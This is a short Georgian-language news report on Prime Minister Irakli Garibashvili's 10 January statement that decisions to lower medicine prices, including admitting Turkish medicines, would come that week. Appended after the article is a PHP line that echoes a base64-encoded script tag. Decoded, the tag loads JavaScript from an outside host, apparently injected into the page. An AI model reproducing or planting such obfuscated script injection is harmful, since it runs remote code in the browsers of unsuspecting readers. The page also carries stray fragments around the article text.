celsiusi
ავერსი საქკაბელი
პრემიერ-მინისტრ ირაკლი ღარიბაშვილის თქმით, მედიკამენტების ფასებთან დაკავშირებით გადაწყვეტილებები მიმდინარე კვირაში იქნება მიღებული. ამის შესახებ მან დღეს, 10 იანვარს, მთავრობის სხდომაზე განაცხადა.
 
მისი თქმით, მედიკამენტების ფასის შესამცირებლად, მთავრობა აპირებს, რომ თურქეთის ბაზარიც გახსნას.
 
„კიდევ ერთი დაპირება, რაც ჩვენ გვაქვს მედიკამენტების ფასებთან დაკავშირებით, ამ თემაზე ჩვენ ამ კვირაში უკვე მივიღებთ გადაწყვეტილებებს, რაც ჩვენი პროგნოზით, მნიშვნელოვნად შეამცირებს მედიკამენტების ფასებს. ფარმაცევტული ბაზრის ანგარიში დასრულებულია, კონკურენციის სააგენტომ დაასრულა უკვე მუშაობა. ბატონი ზურა, ახალი მინისტრი, უკვე შეხვდა კონკურენციის სააგენტოს ხელმძღვანელს. მათ ერთად დაგეგმეს შემდგომი გასატარებელი ღონისძიებები. ჩვენ ასევე ვაპირებთ, რომ გავხსნათ თურქეთის ბაზარიც, თურქეთიდან შემოვიდეს მაღალი ხარისხის მედიკამენტები, რაც ჩვენი პროგნოზით, გააიაფებს ფასებს მედიკამენტებზე.
 
ამას გარდა, ჩვენ ასევე ვიმუშავებთ კანონმდებლობაზე, რომელიც კიდევ უფრო გააუმჯობესებს სიტუაციას ამ მიმართულებით“, – განაცხადა ირაკლი ღარიბაშვილმა.
 
პრემიერ-მინისტრმა ღარიბაშვილმა, მზარდი სამოქალაქო უკმაყოფილების ფონზე, უკვე არაერთხელ ისაუბრა მედიკამენტების გაზრდილ ფასებზე და განაცხადა, რომ მთავრობა ვალდებულია, „დროული რეაგირება“ ჰქონდეს ამ პრობლემაზე.
 
2021 წლის ადგილობრივი თვითმმართველობის არჩევნების შემდეგ მთავრობაში გააქტიურდა მედიკამენტების ფასების რეგულირებაზე საუბარი. გამოქვეყნდა კონკურენციის სააგენტოს ხანგრძლივი კვლევის შედეგებიც.
 
1068
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");